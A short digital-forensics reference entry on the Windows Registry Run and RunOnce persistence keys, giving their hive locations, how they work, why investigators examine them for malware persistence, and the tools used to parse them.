Run / RunOnce Persistence Keys

windowsPersistence MechanismsDisk Image

Location

NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run (per-user) and SOFTWARE\Microsoft\Windows\CurrentVersion\Run (machine-wide)

Description

Registry Run and RunOnce keys that specify programs to execute at user logon (NTUSER.DAT) or system startup (SOFTWARE hive). RunOnce entries are deleted after execution. Both per-user and machine-wide variants exist.

Forensic Value

Run keys are the most common registry persistence mechanism used by malware and attackers. Entries contain the full command line executed at every logon, revealing persistence payloads including encoded PowerShell, mshta calls, or paths to dropped binaries. RunOnce entries execute once and self-delete, but may still be recovered from registry transaction logs or VSS snapshots. Comparing current entries against a known-good baseline immediately identifies attacker additions.

Tools Required

KAPERegistry Explorer (Eric Zimmerman)RegRipperAutoruns (Sysinternals)